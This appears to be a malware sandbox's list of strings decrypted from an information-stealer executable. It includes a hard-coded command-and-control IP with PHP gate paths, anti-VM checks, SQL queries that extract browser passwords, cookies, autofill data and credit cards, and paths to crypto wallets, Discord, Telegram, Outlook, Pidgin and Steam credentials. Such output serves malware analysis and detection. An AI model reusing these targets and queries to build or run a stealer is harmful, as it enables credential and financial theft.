Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: LoadLibraryA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: lstrcatA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: OpenEventA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: CreateEventA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: CloseHandle
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: Sleep
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetUserDefaultLangID
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: VirtualAllocExNuma
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: VirtualFree
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetSystemInfo
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: VirtualAlloc
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: HeapAlloc
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetComputerNameA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: lstrcpyA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetProcessHeap
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetCurrentProcess
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: lstrlenA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: ExitProcess
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GlobalMemoryStatusEx
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetSystemTime
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: SystemTimeToFileTime
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: advapi32.dll
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: gdi32.dll
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: user32.dll
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: crypt32.dll
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: ntdll.dll
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetUserNameA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: CreateDCA
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: GetDeviceCaps
Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack; String decryptor: ReleaseDC
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CryptStringToBinaryA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sscanf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: VMwareVMware
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HAL9TH
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: JohnDoe
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DISPLAY
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %hu/%hu/%hu
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: http://185.172.128.76
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: /3cd2b41cbde8fc9c.php
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: /15f649199f40275b/
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: default10
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetEnvironmentVariableA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetFileAttributesA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalLock
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HeapFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetFileSize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalSize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateToolhelp32Snapshot
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: IsWow64Process
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Process32Next
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetLocalTime
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FreeLibrary
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetTimeZoneInformation
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetSystemPowerStatus
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetVolumeInformationA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetWindowsDirectoryA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Process32First
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetLocaleInfoA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetUserDefaultLocaleName
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetModuleFileNameA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DeleteFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FindNextFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: LocalFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FindClose
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SetEnvironmentVariableA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: LocalAlloc
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetFileSizeEx
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ReadFile
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SetFilePointer
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: WriteFile
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FindFirstFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CopyFileA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: VirtualProtect
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetLastError
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: lstrcpynA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: MultiByteToWideChar
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: WideCharToMultiByte
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GlobalAlloc
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: OpenProcess
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: TerminateProcess
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetCurrentProcessId
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: gdiplus.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ole32.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: bcrypt.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: wininet.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: shlwapi.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: shell32.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: psapi.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: rstrtmgr.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateCompatibleBitmap
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SelectObject
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BitBlt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DeleteObject
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateCompatibleDC
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipGetImageEncodersSize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipGetImageEncoders
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdiplusStartup
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdiplusShutdown
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipSaveImageToStream
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipDisposeImage
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GdipFree
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetHGlobalFromStream
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CreateStreamOnHGlobal
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CoUninitialize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CoInitialize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CoCreateInstance
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptDecrypt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptSetProperty
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptDestroyKey
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetWindowRect
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetDesktopWindow
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetDC
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CloseWindow
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: wsprintfA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: EnumDisplayDevicesA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetKeyboardLayoutList
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CharToOemW
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: wsprintfW
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegQueryValueExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegEnumKeyExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegOpenKeyExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegCloseKey
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RegEnumValueA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CryptBinaryToStringA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CryptUnprotectData
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SHGetFolderPathA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ShellExecuteExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetOpenUrlA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetConnectA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetCloseHandle
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetOpenA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HttpSendRequestA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HttpOpenRequestA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetReadFile
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: InternetCrackUrlA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: StrCmpCA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: StrStrA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: StrCmpCW
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PathMatchSpecA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: GetModuleFileNameExA
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RmStartSession
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RmRegisterResources
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RmGetList
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: RmEndSession
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_open
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_prepare_v2
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_step
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_column_text
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_finalize
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_close
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_column_bytes
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: sqlite3_column_blob
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: encrypted_key
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PATH
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: NSS_Init
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: NSS_Shutdown
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PK11_GetInternalKeySlot
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PK11_FreeSlot
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PK11_Authenticate
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: PK11SDR_Decrypt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: C:\ProgramData\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: browser:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: profile:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: url:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: login:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: password:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Opera
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: OperaGX
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Network
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: cookies
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: .txt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: TRUE
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: FALSE
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: autofill
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT name, value FROM autofill
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: history
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: name:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: month:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: year:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: card:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Cookies
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Login Data
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Web Data
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: History
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: logins.json
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: formSubmitURL
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: usernameField
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: encryptedUsername
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: encryptedPassword
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: guid
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: cookies.sqlite
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: formhistory.sqlite
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: places.sqlite
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: plugins
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Local Extension Settings
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Sync Extension Settings
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: IndexedDB
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Opera Stable
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Opera GX Stable
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: CURRENT
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: chrome-extension_
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: _0.indexeddb.leveldb
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Local State
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: profiles.ini
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: chrome
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: opera
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: firefox
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: wallets
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %08lX%04lX%lu
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ProductName
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: ProcessorNameString
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DisplayName
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: DisplayVersion
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Network Info:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - IP: IP?
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Country: ISO?
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: System Summary:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - HWID:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - OS:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Architecture:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - UserName:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Computer Name:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Local Time:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - UTC:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Language:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Keyboards:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Laptop:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Running Path:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - CPU:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Threads:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Cores:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - RAM:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - Display Resolution:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: - GPU:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: User Agents:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Installed Apps:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: All Users:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Current User:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Process List:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: system_info.txt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: freebl3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: mozglue.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: msvcp140.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: nss3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: softokn3.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: vcruntime140.dll
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Temp\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: .exe
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: runas
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: open
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: /c start
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %DESKTOP%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %APPDATA%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %LOCALAPPDATA%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %USERPROFILE%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %DOCUMENTS%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %PROGRAMFILES%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %PROGRAMFILES_86%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: %RECENT%
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: *.lnk
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: files
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \discord\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Local Storage\leveldb
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: \Telegram Desktop\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: key_datas
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: D877F783D5D3EF8C*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: map*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: A7FDF864FBC10B77*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: A92DAA6EA6F891F2*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: F8806DD0C461824F*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Telegram
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: *.tox
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: *.ini
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Password
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: 00000001
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: 00000002
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: 00000003
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpackString decryptor: 00000004
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: \Outlook\accounts.txt
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: Pidgin
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: \.purple\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: accounts.xml
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: dQw4w9WgXcQ
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: token:
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: Software\Valve\Steam
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: SteamPath
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: \config\
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: ssfn*
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: config.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: DialogConfig.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: DialogConfigOverlay*.vdf
                        Source: 10.3.u5v8.0.exe.4200000.0.raw.unpack String decryptor: libraryfolders.vdf
